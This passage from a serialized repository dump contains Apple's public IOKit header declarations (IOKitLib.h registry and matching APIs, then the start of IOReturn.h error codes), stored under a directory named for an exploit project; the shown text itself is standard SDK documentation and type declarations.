Pass kIOMasterPortDefault to look up the default master port.\n    @param path A C-string path.\n    @result A handle to the IORegistryEntry which was found with the path, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */\n\nio_registry_entry_t\nIORegistryEntryFromPath(\n\tmach_port_t\t\tmasterPort,\n\tconst io_string_t\tpath );\n\n// options for IORegistryCreateIterator(), IORegistryEntryCreateIterator, IORegistryEntrySearchCFProperty()\nenum {\n    kIORegistryIterateRecursively\t= 0x00000001,\n    kIORegistryIterateParents\t\t= 0x00000002\n};\n\n/*! @function IORegistryCreateIterator\n    @abstract Create an iterator rooted at the registry root.\n    @discussion This method creates an IORegistryIterator in the kernel that is set up with options to iterate children of the registry root entry, and to recurse automatically into entries as they are returned, or only when instructed with calls to IORegistryIteratorEnterEntry. The iterator object keeps track of entries that have been recursed into previously to avoid loops.\n    @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n    @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n    @param options kIORegistryIterateRecursively may be set to recurse automatically into each entry as it is returned from IOIteratorNext calls on the registry iterator. \n    @param iterator A created iterator handle, to be released by the caller when it has finished with it.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryCreateIterator(\n\tmach_port_t\tmasterPort,\n\tconst io_name_t\tplane,\n\tIOOptionBits\toptions,\n\tio_iterator_t * iterator );\n\n/*! 
@function IORegistryEntryCreateIterator\n    @abstract Create an iterator rooted at a given registry entry.\n    @discussion This method creates an IORegistryIterator in the kernel that is set up with options to iterate children or parents of a root entry, and to recurse automatically into entries as they are returned, or only when instructed with calls to IORegistryIteratorEnterEntry. The iterator object keeps track of entries that have been recursed into previously to avoid loops.\n    @param entry The root entry to begin the iteration at.\n    @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n    @param options kIORegistryIterateRecursively may be set to recurse automatically into each entry as it is returned from IOIteratorNext calls on the registry iterator. kIORegistryIterateParents may be set to iterate the parents of each entry, by default the children are iterated.\n    @param iterator A created iterator handle, to be released by the caller when it has finished with it.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryCreateIterator(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tIOOptionBits\t\toptions,\n\tio_iterator_t \t      * iterator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistryIterator, subclass of IOIterator\n */\n\n/*! @function IORegistryIteratorEnterEntry\n    @abstract Recurse into the current entry in the registry iteration.\n    @discussion This method makes the current entry, ie. the last entry returned by IOIteratorNext, the root in a new level of recursion.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryIteratorEnterEntry(\n\tio_iterator_t\titerator );\n\n/*! 
@function IORegistryIteratorExitEntry\n    @abstract Exits a level of recursion, restoring the current entry.\n    @discussion This method undoes an IORegistryIteratorEnterEntry, restoring the current entry. If there are no more levels of recursion to exit false is returned, otherwise true is returned.\n    @result kIOReturnSuccess if a level of recursion was undone, kIOReturnNoDevice if no recursive levels are left in the iteration. */\n\nkern_return_t\nIORegistryIteratorExitEntry(\n\tio_iterator_t\titerator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistryEntry, subclass of IOObject\n */\n\n/*! @function IORegistryEntryGetName\n    @abstract Returns a C-string name assigned to a registry entry.\n    @discussion Registry entries can be named in a particular plane, or globally. This function returns the entry's global name. The global name defaults to the entry's meta class name if it has not been named.\n    @param entry The registry entry handle whose name to look up.\n    @param name The caller's buffer to receive the name.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetName(\n\tio_registry_entry_t\tentry,\n\tio_name_t \t        name );\n\n/*! @function IORegistryEntryGetNameInPlane\n    @abstract Returns a C-string name assigned to a registry entry, in a specified plane.\n    @discussion Registry entries can be named in a particular plane, or globally. This function returns the entry's name in the specified plane or global name if it has not been named in that plane. The global name defaults to the entry's meta class name if it has not been named.\n    @param entry The registry entry handle whose name to look up.\n    @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n    @param name The caller's buffer to receive the name.\n    @result A kern_return_t error code. 
*/\n\nkern_return_t\nIORegistryEntryGetNameInPlane(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t \tplane,\n\tio_name_t \t        name );\n\n/*! @function IORegistryEntryGetLocationInPlane\n    @abstract Returns a C-string location assigned to a registry entry, in a specified plane.\n    @discussion Registry entries can be given a location string in a particular plane, or globally. If the entry has had a location set in the specified plane that location string will be returned, otherwise the global location string is returned. If no global location string has been set, an error is returned.\n    @param entry The registry entry handle whose location to look up.\n    @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n    @param location The caller's buffer to receive the location string.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetLocationInPlane(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t \tplane,\n\tio_name_t \t        location );\n\n/*! @function IORegistryEntryGetPath\n    @abstract Create a path for a registry entry.\n    @discussion The path for a registry entry is copied to the caller's buffer. The path describes the entry's attachment in a particular plane, which must be specified. The path begins with the plane name followed by a colon, and then followed by '/' separated path components for each of the entries between the root and the registry entry. An alias may also exist for the entry, and will be returned if available.\n    @param entry The registry entry handle whose path to look up.\n    @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n    @param path A char buffer allocated by the caller, of type io_string_t.\n    @result IORegistryEntryGetPath will fail if the entry is not attached in the plane, or if the buffer is not large enough to contain the path. 
*/\n\nkern_return_t\nIORegistryEntryGetPath(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t         plane,\n\tio_string_t\t\tpath );\n\n/*! @function IORegistryEntryCreateCFProperties\n    @abstract Create a CF dictionary representation of a registry entry's property table.\n    @discussion This function creates an instantaneous snapshot of a registry entry's property table, creating a CFDictionary analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts. \n    @param entry The registry entry handle whose property table to copy.\n    @param properties A CFDictionary is created and returned the caller on success. The caller should release with CFRelease.\n    @param allocator The CF allocator to use when creating the CF containers.\n    @param options No options are currently defined.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryCreateCFProperties(\n\tio_registry_entry_t\tentry,\n\tCFMutableDictionaryRef * properties,\n        CFAllocatorRef\t\tallocator,\n\tIOOptionBits\t\toptions );\n\n/*! @function IORegistryEntryCreateCFProperty\n    @abstract Create a CF representation of a registry entry's property.\n    @discussion This function creates an instantaneous snapshot of a registry entry property, creating a CF container analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts. 
\n    @param entry The registry entry handle whose property to copy.\n    @param key A CFString specifying the property name.\n    @param allocator The CF allocator to use when creating the CF container.\n    @param options No options are currently defined.\n    @result A CF container is created and returned to the caller on success. The caller should release with CFRelease. */\n\nCFTypeRef\nIORegistryEntryCreateCFProperty(\n\tio_registry_entry_t\tentry,\n\tCFStringRef\t\tkey,\n        CFAllocatorRef\t\tallocator,\n\tIOOptionBits\t\toptions );\n\n/*! @function IORegistryEntrySearchCFProperty\n    @abstract Create a CF representation of a registry entry's property.\n    @discussion This function creates an instantaneous snapshot of a registry entry property, creating a CF container analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts. \nThis function will search for a property, starting with the specified registry entry's property table, then iterating recursively through either the parent registry entries or the child registry entries of this entry. Once the first occurrence is found, it will look up and return the value of the property, using the same semantics as IORegistryEntryCreateCFProperty. The iteration keeps track of entries that have been recursed into previously to avoid loops.\n    @param entry The registry entry at which to start the search.\n    @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n    @param key A CFString specifying the property name.\n    @param allocator The CF allocator to use when creating the CF container.\n    @param options kIORegistryIterateRecursively may be set to recurse automatically into the registry hierarchy. 
Without this option, this method degenerates into the standard IORegistryEntryCreateCFProperty() call. kIORegistryIterateParents may be set to iterate the parents of the entry, in place of the children.\n    @result A CF container is created and returned the caller on success. The caller should release with CFRelease. */\n\nCFTypeRef\nIORegistryEntrySearchCFProperty(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tCFStringRef\t\tkey,\n        CFAllocatorRef\t\tallocator,\n\tIOOptionBits\t\toptions );\n\n/*  @function IORegistryEntryGetProperty - deprecated,\n    use IORegistryEntryCreateCFProperty */\n\nkern_return_t\nIORegistryEntryGetProperty(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tpropertyName,\n\tio_struct_inband_t\tbuffer,\n\tuint32_t\t      * size );\n\n/*! @function IORegistryEntrySetCFProperties\n    @abstract Set CF container based properties in a registry entry.\n    @discussion This is a generic method to pass a CF container of properties to an object in the registry. Setting properties in a registry entry is not generally supported, it is more common to support IOConnectSetCFProperties for connection based property setting. The properties are interpreted by the object.\n    @param entry The registry entry whose properties to set.\n    @param properties A CF container - commonly a CFDictionary but this is not enforced. The container should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n    @result A kern_return_t error code returned by the object. */\n\nkern_return_t\nIORegistryEntrySetCFProperties(\n\tio_registry_entry_t\tentry,\n\tCFTypeRef\t \tproperties );\n\n/*! 
@function IORegistryEntrySetCFProperty\n    @abstract Set a CF container based property in a registry entry.\n    @discussion This is a generic method to pass a CF container as a property to an object in the registry. Setting properties in a registry entry is not generally supported, it is more common to support IOConnectSetCFProperty for connection based property setting. The property is interpreted by the object.\n    @param entry The registry entry whose property to set.\n    @param propertyName The name of the property as a CFString.\n    @param property A CF container - should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n    @result A kern_return_t error code returned by the object. */\n\nkern_return_t\nIORegistryEntrySetCFProperty(\n\tio_registry_entry_t\tentry,\n        CFStringRef\t\tpropertyName,\n\tCFTypeRef\t \tproperty );\n\n/*! @function IORegistryEntryGetChildIterator\n    @abstract Returns an iterator over an registry entry's child entries in a plane.\n    @discussion This method creates an iterator which will return each of a registry entry's child entries in a specified plane.\n    @param entry The registry entry whose children to iterate over.\n    @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n    @param iterator The created iterator over the children of the entry, on success. The iterator must be released when the iteration is finished.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetChildIterator(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tio_iterator_t\t      * iterator );\n\n/*! 
@function IORegistryEntryGetChildEntry\n    @abstract Returns the first child of a registry entry in a plane.\n    @discussion This function will return the child which first attached to a registry entry in a plane.\n    @param entry The registry entry whose child to look up.\n    @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n    @param child The first child of the registry entry, on success. The child must be released by the caller.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetChildEntry(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tio_registry_entry_t   * child );\n\n/*! @function IORegistryEntryGetParentIterator\n    @abstract Returns an iterator over a registry entry's parent entries in a plane.\n    @discussion This method creates an iterator which will return each of a registry entry's parent entries in a specified plane.\n    @param entry The registry entry whose parents to iterate over.\n    @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n    @param iterator The created iterator over the parents of the entry, on success. The iterator must be released when the iteration is finished.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetParentIterator(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tio_iterator_t\t      * iterator );\n\n/*! @function IORegistryEntryGetParentEntry\n    @abstract Returns the first parent of a registry entry in a plane.\n    @discussion This function will return the parent to which the registry entry was first attached in a plane.\n    @param entry The registry entry whose parent to look up.\n    @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n    @param parent The first parent of the registry entry, on success. 
The parent must be released by the caller.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetParentEntry(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tio_registry_entry_t   * parent );\n\n/*! @function IORegistryEntryInPlane\n    @abstract Determines if the registry entry is attached in a plane.\n    @discussion This method determines if the entry is attached in a plane to any other entry.\n    @param entry The registry entry.\n    @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n    @result If the entry has a parent in the plane, true is returned, otherwise false is returned. */\n\nboolean_t\nIORegistryEntryInPlane(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * Matching dictionary creation helpers\n */\n\n/*! @function IOServiceMatching\n    @abstract Create a matching dictionary that specifies an IOService class match.\n    @discussion A very common matching criteria for IOService is based on its class. IOServiceMatching will create a matching dictionary that specifies any IOService of a class, or its subclasses. The class is specified by C-string name.\n    @param name The class name, as a const C-string. Class matching is successful on IOService's of this class or any subclass.\n    @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOServiceMatching(\n\tconst char *\tname );\n\n/*! @function IOServiceNameMatching\n    @abstract Create a matching dictionary that specifies an IOService name match.\n    @discussion A common matching criteria for IOService is based on its name. 
IOServiceNameMatching will create a matching dictionary that specifies an IOService with a given name. Some IOServices created from the OpenFirmware device tree will perform name matching on the standard OF compatible, name, model properties.\n    @param name The IOService name, as a const C-string.\n    @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOServiceNameMatching(\n\tconst char *\tname );\n\n/*! @function IOBSDNameMatching\n    @abstract Create a matching dictionary that specifies an IOService match based on BSD device name.\n    @discussion IOServices that represent BSD devices have an associated BSD name. This function creates a matching dictionary that will match IOService's with a given BSD name.\n    @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n    @param options No options are currently defined.\n    @param bsdName The BSD name, as a const char *.\n    @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOBSDNameMatching(\n\tmach_port_t\tmasterPort,\n\tuint32_t\toptions,\n\tconst char *\tbsdName );\n\n/*! 
@function IOOpenFirmwarePathMatching\n    @abstract Create a matching dictionary that specifies an IOService match based on  an OpenFirmware device path.\n    @discussion Certain IOServices (currently, block and ethernet boot devices) may be looked up by a path that specifies their location in the OpenFirmware device tree, represented in the registry by the kIODeviceTreePlane plane. This function creates a matching dictionary that will match IOService's found with a given OpenFirmware device path.\n    @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n    @param options No options are currently defined.\n    @param path The OpenFirmware device path, as a const char *.\n    @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOOpenFirmwarePathMatching(\n\tmach_port_t\tmasterPort,\n\tuint32_t\toptions,\n\tconst char *\tpath );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @function IOServiceOFPathToBSDName\n    @abstract Utility to look up an IOService from its OpenFirmware device path, and return its BSD device name if available.\n    @discussion Certain IOServices (currently, block and ethernet boot devices) may be looked up by a path that specifies their location in the OpenFirmware device tree, represented in the registry by the kIODeviceTreePlane plane. This function looks up an IOService object with a given OpenFirmware device path, and returns its associated BSD device name.\n    @param masterPort The master port obtained from IOMasterPort(). 
Pass kIOMasterPortDefault to look up the default master port.\n    @param openFirmwarePath The OpenFirmware device path, as a const char *.\n    @param bsdName The BSD name, as a const char *, is copied to the callers buffer.\n    @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceOFPathToBSDName(mach_port_t\t\tmasterPort,\n                         const io_name_t\topenFirmwarePath,\n                         io_name_t\t\tbsdName);\n\t\t\t\t\t\t \n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @typedef IOAsyncCallback0\n    @abstract standard callback function for asynchronous I/O requests with\n    no extra arguments beyond a refcon and result code.\n    @param refcon The refcon passed into the original I/O request\n    @param result The result of the I/O operation\n*/\ntypedef void (*IOAsyncCallback0)(void *refcon, IOReturn result);\n\n/*! @typedef IOAsyncCallback1\n    @abstract standard callback function for asynchronous I/O requests with\n    one extra argument beyond a refcon and result code.\n    This is often a count of the number of bytes transferred\n    @param refcon The refcon passed into the original I/O request\n    @param result The result of the I/O operation\n    @param arg0\tExtra argument\n*/\ntypedef void (*IOAsyncCallback1)(void *refcon, IOReturn result, void *arg0);\n\n/*! @typedef IOAsyncCallback2\n    @abstract standard callback function for asynchronous I/O requests with\n    two extra arguments beyond a refcon and result code.\n    @param refcon The refcon passed into the original I/O request\n    @param result The result of the I/O operation\n    @param arg0\tExtra argument\n    @param arg1\tExtra argument\n*/\ntypedef void (*IOAsyncCallback2)(void *refcon, IOReturn result, void *arg0, void *arg1);\n\n/*! 
@typedef IOAsyncCallback\n    @abstract standard callback function for asynchronous I/O requests with\n    lots of extra arguments beyond a refcon and result code.\n    @param refcon The refcon passed into the original I/O request\n    @param result The result of the I/O operation\n    @param args\tArray of extra arguments\n    @param numArgs Number of extra arguments\n*/\ntypedef void (*IOAsyncCallback)(void *refcon, IOReturn result, void **args,\n                                uint32_t numArgs);\n\n\n/* Internal use */\n\nkern_return_t\nOSGetNotificationFromMessage(\n\tmach_msg_header_t     * msg,\n\tuint32_t\t  \tindex,\n        uint32_t    \t      * type,\n        uintptr_t\t      * reference,\n\tvoid\t\t     ** content,\n        vm_size_t\t      * size );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/* Internal use */\n\nkern_return_t\nIOCatalogueSendData(\n        mach_port_t             masterPort,\n        uint32_t                flag,\n        const char             *buffer,\n        uint32_t                size );\n\nkern_return_t\nIOCatalogueTerminate(\n        mach_port_t\t\tmasterPort,\n        uint32_t                flag,\n\tio_name_t\t\tdescription );\n\nkern_return_t\nIOCatalogueGetData(\n        mach_port_t             masterPort,\n        uint32_t                flag,\n        char                  **buffer,\n        uint32_t               *size );\n\nkern_return_t\nIOCatalogueModuleLoaded(\n        mach_port_t             masterPort,\n        io_name_t               name );\n\nkern_return_t\nIOCatalogueReset(\n        mach_port_t             masterPort,\n        uint32_t                flag );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n// obsolete API\n\n#if !defined(__LP64__)\n\n// for Power Mgt\n\ntypedef struct IOObject IOObject;\n\n// for MacOS.app\n\nkern_return_t\nIORegistryDisposeEnumerator(\n\tio_enumerator_t\tenumerator ) 
DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nIOMapMemory(\n\tio_connect_t\tconnect,\n\tuint32_t\tmemoryType,\n\ttask_port_t\tintoTask,\n\tvm_address_t *\tatAddress,\n\tvm_size_t    *\tofSize,\n\tuint32_t\tflags ) DEPRECATED_ATTRIBUTE;\n\n// for CGS\n\nkern_return_t\nIOCompatibiltyNumber(\n\tmach_port_t\tconnect,\n\tuint32_t *\tobjectNumber ) DEPRECATED_ATTRIBUTE;\n\n// Traditional IOUserClient transport routines\nkern_return_t\nIOConnectMethodScalarIScalarO( \n\tio_connect_t\tconnect,\n        uint32_t\tindex,\n        IOItemCount\tscalarInputCount,\n        IOItemCount\tscalarOutputCount,\n        ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodScalarIStructureO(\n\tio_connect_t\tconnect,\n        uint32_t\tindex,\n        IOItemCount\tscalarInputCount,\n        IOByteCount *\tstructureSize,\n        ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodScalarIStructureI(\n\tio_connect_t\tconnect,\n        uint32_t\tindex,\n        IOItemCount\tscalarInputCount,\n        IOByteCount\tstructureSize,\n        ... 
) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodStructureIStructureO(\n\tio_connect_t\tconnect,\n        uint32_t\tindex,\n        IOItemCount\tstructureInputSize,\n        IOByteCount *\tstructureOutputSize,\n        void *\t\tinputStructure,\n        void *\t\touputStructure ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\n// Compatability with earlier Mig interface routines\n#if IOCONNECT_NO_32B_METHODS\n\nkern_return_t\nio_connect_map_memory(\n\tio_connect_t\t\tconnect,\n\tuint32_t\t\tmemoryType,\n\ttask_port_t\t\tintoTask,\n\tvm_address_t\t\t*atAddress,\n\tvm_size_t\t\t*ofSize,\n\tIOOptionBits\t\toptions) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_unmap_memory(\n\tio_connect_t\t\tconnect,\n\tuint32_t\t\tmemoryType,\n\ttask_port_t\t\tfromTask,\n\tvm_address_t\t\tatAddress) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_scalarO(\n\tmach_port_t connection,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_scalar_inband_t output,\n\tmach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_structureO(\n\tmach_port_t connection,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t output,\n\tmach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_structureI(\n\tmach_port_t connection,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t inputStruct,\n\tmach_msg_type_number_t inputStructCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_structureI_structureO(\n\tmach_port_t connection,\n\tint selector,\n\tio_struct_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t output,\n\tmach_msg_type_number_t *outputCnt) 
DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_scalarO(\n\tmach_port_t connection,\n\tmach_port_t wake_port,\n\tio_async_ref_t reference,\n\tmach_msg_type_number_t referenceCnt,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_scalar_inband_t output,\n\tmach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_structureO(\n\tmach_port_t connection,\n\tmach_port_t wake_port,\n\tio_async_ref_t reference,\n\tmach_msg_type_number_t referenceCnt,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t output,\n\tmach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_structureI(\n\tmach_port_t connection,\n\tmach_port_t wake_port,\n\tio_async_ref_t reference,\n\tmach_msg_type_number_t referenceCnt,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t inputStruct,\n\tmach_msg_type_number_t inputStructCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_structureI_structureO(\n\tmach_port_t connection,\n\tmach_port_t wake_port,\n\tio_async_ref_t reference,\n\tmach_msg_type_number_t referenceCnt,\n\tint selector,\n\tio_struct_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t output,\n\tmach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n#endif // IOCONNECT_NO_32B_METHODS\n\n#endif /* defined(__LP64__) */\n\n__END_DECLS\n\n#endif /* ! _IOKIT_IOKITLIB_H */\n"
  },
  {
    "path": "Exploits/sock_port/include/IOKit/IOReturn.h",
    "content": "/*\n * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n * \n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n * \n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n * \n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n * \n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n/*\n * HISTORY\n */\n \n/*\n * Core IOReturn values. 
Others may be family defined.\n */\n\n#ifndef __IOKIT_IORETURN_H\n#define __IOKIT_IORETURN_H\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n#include <mach/error.h>\n\ntypedef\tkern_return_t\t\tIOReturn;\n\n#ifndef sys_iokit\n#define sys_iokit                         err_system(0x38)\n#endif /* sys_iokit */\n#define sub_iokit_common                  err_sub(0)\n#define sub_iokit_usb                     err_sub(1)\n#define sub_iokit_firewire                err_sub(2)\n#define sub_iokit_block_storage           err_sub(4)\n#define sub_iokit_graphics                err_sub(5)\n#define sub_iokit_networking\t\t  err_sub(6)\n#define sub_iokit_bluetooth               err_sub(8)\n#define sub_iokit_pmu                     err_sub(9)\n#define sub_iokit_acpi                    err_sub(10)\n#define sub_iokit_smbus                   err_sub(11)\n#define sub_iokit_ahci                    err_sub(12)\n#define sub_iokit_powermanagement         err_sub(13)\n//#define sub_iokit_hidsystem             err_sub(14)\n#define sub_iokit_scsi                    err_sub(16)\n//#define sub_iokit_pccard                err_sub(21)\n\n#define sub_iokit_vendor_specific         err_sub(-2)\n#define sub_iokit_reserved                err_sub(-1)\n\n#define\tiokit_common_err(return)          (sys_iokit|sub_iokit_common|return)\n#define\tiokit_family_err(sub,return)      (sys_iokit|sub|return)\n#define iokit_vendor_specific_err(return) (sys_iokit|sub_iokit_vendor_specific|return)\n\n#define kIOReturnSuccess         KERN_SUCCESS            // OK\n#define kIOReturnError           iokit_common_err(0x2bc) // general error \t\n#define kIOReturnNoMemory        iokit_common_err(0x2bd) // can't allocate memory \n#define kIOReturnNoResources     iokit_common_err(0x2be) // resource shortage \n#define kIOReturnIPCError        iokit_common_err(0x2bf) // error during IPC \n#define kIOReturnNoDevice        iokit_common_err(0x2c0) // no such device \n#define kIOReturnNotPrivileged   iokit_common_err(0x2c1) // 
privilege violation \n#define kIOReturnBadArgument     iokit_common_err(0x2c2) // invalid argument \n#define kIOReturnLockedRead      iokit_common_err(0x2c3) // device read locked \n#define kIOReturnLockedWrite     iokit_common_err(0x2c4) // device write locked \n#define kIOReturnExclusiveAccess iokit_common_err(0x2c5) // exclusive access and\n                                                         //   device already open \n#define kIOReturnBadMessageID    iokit_common_err(0x2c6) // sent/received messages\n                                                         //   had different msg_id\n#define kIOReturnUnsupported     iokit_common_err(0x2c7) // unsupported function \n#define kIOReturnVMError         iokit_common_err(0x2c8) // misc. VM failure \n#define kIOReturnInternalError   iokit_common_err(0x2c9) // internal error \n#define kIOReturnIOError         iokit_common_err(0x2ca) // General I/O error \n//#define kIOReturn???Error      iokit_common_err(0x2cb) // ??? \n#define kIOReturnCannotLock      iokit_common_err(0x2cc) // can't acquire lock\n#define kIOReturnNotOpen         iokit_common_err(0x2cd) // device not open \n#define kIOReturnNotReadable     iokit_common_err(0x2ce) // read not supported \n#define kIOReturnNotWritable     iokit_common_err(0x2cf) // write not supported \n#define kIOReturnNotAligned      iokit_common_err(0x2d0) // alignment error \n#define kIOReturnBadMedia        iokit_common_err(0x2d1) // Media Error \n#define kIOReturnStillOpen       iokit_common_err(0x2d2) // device(s) still open \n#define kIOReturnRLDError        iokit_common_err(0x2d3) // rld failure \n#define kIOReturnDMAError        iokit_common_err(0x2d4) // DMA failure \n#define kIOReturnBusy            iokit_common_err(0x2d5) // Device Busy \n#define kIOReturnTimeout         iokit_common_err(0x2d6) // I/O Timeout \n#define kIOReturnOffline         iokit_common_err(0x2d7) // device offline \n#define 